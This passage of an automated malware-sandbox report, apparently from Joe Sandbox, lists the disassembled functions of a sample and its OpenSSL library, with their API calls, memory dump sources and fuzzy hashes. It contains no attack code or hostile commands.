                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12019A21B0B64B84FE66BBA298106B612905F85BB0F0C4731CB3E863F9EE2CE4508211
                                                                                                                                                                                                                            Function 00007FFE00734DA0 Relevance: 2.5, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877321758.00007FFE00730000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877524588.00007FFE00814000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3168844106-0
                                                                                                                                                                                                                            • Opcode ID: aedc2f95588a6fbf9a36fbe003774c471f00d015cb4bcc21b6c9f8d1b9a87ab4
                                                                                                                                                                                                                            • Instruction ID: 839c759d6a586ea6bb5c8b70f89281752b8545af5978ce78f3e3eba383a663cf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aedc2f95588a6fbf9a36fbe003774c471f00d015cb4bcc21b6c9f8d1b9a87ab4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39113032A19A82C9F710AF14E4415B96765FF84744F490436DB8D877B9DE7CE8618740
                                                                                                                                                                                                                            Function 00007FFE00735A80 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00735A8D
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734DA0: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00734DCC
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734DA0: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00734E21
                                                                                                                                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00735AB3
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734E48: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE00734E68
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734EA4: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FFE00734F00
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877321758.00007FFE00730000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877524588.00007FFE00814000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$HandleInfoStartup
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 425825594-0
                                                                                                                                                                                                                            • Opcode ID: a535cf6ea78c14f9548de41ac69a0b4f11440ecbddb6f397c1a3bd186c670360
                                                                                                                                                                                                                            • Instruction ID: 49e62ad4b7317a0c37a64399e10e29d9181b26d797f991eb6cc52553c45b5def
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a535cf6ea78c14f9548de41ac69a0b4f11440ecbddb6f397c1a3bd186c670360
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1E01D11E5A55399F755BB709C654B923247F54305F8D0035DF4D813BAEF1CB4A5C320
                                                                                                                                                                                                                            Function 00007FF6029AAD2C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 163c26017b4d623b246614f7933dd7f519476f5a157ff8b19f9d62dbc6a7269b
                                                                                                                                                                                                                            • Instruction ID: 6fd7b923c715f0588f5677fe6d3fb500a8d752ada4680f537129e062fd3c31ea
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 163c26017b4d623b246614f7933dd7f519476f5a157ff8b19f9d62dbc6a7269b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73416032D0874287EB24DB1AA5402797BA0EF56B59F340131DADEC76A2CFADE402C691
                                                                                                                                                                                                                            Function 00007FF6029975F0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                            • Opcode ID: 5e5cc40571deac48eb3fe8e7de9ed8303070c1f31298c922485ebaa930e2f166
                                                                                                                                                                                                                            • Instruction ID: a6c5cb69d1d697780ce9219e97b5c32afa3a8b591fdd7e471665879650063fca
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e5cc40571deac48eb3fe8e7de9ed8303070c1f31298c922485ebaa930e2f166
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA219161B286524AFA149A5B69043FADE41FF45BE8FA84430EE0D87B87CEBDE0518301
                                                                                                                                                                                                                            Function 00007FF6029AA7BC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 1aef78a39c500d32b159f644f13bb953a1d4f559f818596848ede94d06a0f0b5
                                                                                                                                                                                                                            • Instruction ID: cbfd74a20de804c0d90bdf18e89bae1158b8eae33ce13d410f3799eb8dadd14d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1aef78a39c500d32b159f644f13bb953a1d4f559f818596848ede94d06a0f0b5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16316B31E1875286E751AB5AC84137C6EA0AF50BA9F710135EA1D833D3CEFCA842C7D5
                                                                                                                                                                                                                            Function 00007FF6029A4FF4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: cb19defa627178e49106467df727be20a8e9bfb9e75dc61aeb2f7622f0478853
                                                                                                                                                                                                                            • Instruction ID: 718a1bb65d13f63d3b0dff19f7c56cf15311cef6b5c8f46307f4ee4f79e1465f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb19defa627178e49106467df727be20a8e9bfb9e75dc61aeb2f7622f0478853
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE116021E1C74182FB609F13D800279AAA4BF95B88F746031EA8D97A9BCFFDD41087C1
                                                                                                                                                                                                                            Function 00007FF6029B53BC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 29e5ed0ae5cace574c450553634763957b08ab45ee51775de7c74767efaf917a
                                                                                                                                                                                                                            • Instruction ID: 602330cc4b712b00caed7cf949e521f77b59001d23ab2421726efea78f481217
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29e5ed0ae5cace574c450553634763957b08ab45ee51775de7c74767efaf917a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F218732A0864187D7629F1AE5403797AA1FF84B58F754234E65DC76D6DFBCD4058B00
                                                                                                                                                                                                                            Function 00007FF60299F42C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            • Opcode ID: 70126ac7fec55f7d0bd94c5b9190ce1d02d48622baccf79bcc7dcf74a444fe57
                                                                                                                                                                                                                            • Instruction ID: dd93d2f177b16c2fd1ec70aee48b0e0778ba38d88a9ad839edef21e7b10bd0ea
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70126ac7fec55f7d0bd94c5b9190ce1d02d48622baccf79bcc7dcf74a444fe57
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1017C61A0874240EA04DB579900069AB95FF96FF8B284631DE6CD7BD7CEBCD0218740
                                                                                                                                                                                                                            Function 00007FF6029980F0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602998410: MultiByteToWideChar.KERNEL32(?,?,?,00007FF602993F84,00000000,00007FF602991925), ref: 00007FF602998449
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00007FF602995BE6,?,00007FF60299308E), ref: 00007FF602998112
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                                                                                            • Opcode ID: 0cc31a8fca4ab565add3ef2548fb4ddc793d9640860187b6cf97bc6f4a16c7d3
                                                                                                                                                                                                                            • Instruction ID: 9652039200475d9f1aa31e8fbc2f87db662574c59e18fb9f5d94bc655ba989b8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cc31a8fca4ab565add3ef2548fb4ddc793d9640860187b6cf97bc6f4a16c7d3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2ED0C201F2824141FB84A77BBA465395651AFCABC4F689034EE0D83B47DC3CC4910B04
                                                                                                                                                                                                                            Function 00007FF6029AC47C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF60299FD00,?,?,?,00007FF6029A136A,?,?,?,?,?,00007FF6029A2B59), ref: 00007FF6029AC4BA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            • Opcode ID: 139518de3d1453d714993cc24149baa1dfebbcba10148b546485c74ee49a4d3a
                                                                                                                                                                                                                            • Instruction ID: 813fd263b8c7434dfa10ab1665f6b39bce1b60ec868ca1c8abfc976c563b0b4b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 139518de3d1453d714993cc24149baa1dfebbcba10148b546485c74ee49a4d3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F0EC01F0D30386FF1827B3480127419D09F547A8F380631DC2ECA6C3DEECA04082A4

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 00007FFDFF266030 Relevance: 138.7, APIs: 77, Strings: 2, Instructions: 439COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ERR_new.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF266062
                                                                                                                                                                                                                            • ERR_set_debug.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF26607A
                                                                                                                                                                                                                            • ERR_set_error.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF26608C
                                                                                                                                                                                                                            • ERR_new.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF2660BC
                                                                                                                                                                                                                            • ERR_set_debug.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF2660D4
                                                                                                                                                                                                                            • ERR_set_error.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF2660E6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$dane_tlsa_add
                                                                                                                                                                                                                            • API String ID: 1552677711-3143159635
                                                                                                                                                                                                                            • Opcode ID: 551c87e53307f0464cbc915bc00dac611a03fa4d0804b3cb6043db781686e7c8
                                                                                                                                                                                                                            • Instruction ID: d798c6c135dc446d93c6e4c5f504ca3561af2a09600f316f98218e783267e8e6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 551c87e53307f0464cbc915bc00dac611a03fa4d0804b3cb6043db781686e7c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B026C21F0D69246FB14A715E461EF99760AF81750F808235DE7DCB6EEEE3CE9458B00
                                                                                                                                                                                                                            Function 00007FFDFF2BBB70 Relevance: 77.4, APIs: 42, Strings: 2, Instructions: 433COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_new_nullL_sk_pop_freeR_newR_set_debugX509X509_freeX509_new_exd2i_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_process_client_certificate
                                                                                                                                                                                                                            • API String ID: 3085087540-2403068147
                                                                                                                                                                                                                            • Opcode ID: 96cccb673fb7a0223120be839b847c22047223b73bf956a95570213e9be3475c
                                                                                                                                                                                                                            • Instruction ID: 4975c51eaaf877ecf5a826403bbade88fb16c0b250547931e4618fbb15580f23
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96cccb673fb7a0223120be839b847c22047223b73bf956a95570213e9be3475c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F127A61B09A8289FB14DB65D460AFD6760EB85B84F844236EE7DC76DEEE3CE540C700
                                                                                                                                                                                                                            Function 00007FFDFF241D93 Relevance: 67.0, APIs: 33, Strings: 5, Instructions: 480COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X_free$O_free$R_free$C_freeX_new$C_fetchC_finalC_initDecryptInit_exM_construct_endM_construct_utf8_stringN1_item_freeO_mallocO_memcmpR_clear_errorR_fetchR_newR_set_debugR_set_errorX_get_iv_lengthX_get_mac_sizememcpy
                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_lib.c$AES-256-CBC$HMAC$SHA256$digest
                                                                                                                                                                                                                            • API String ID: 3158562322-2842977263
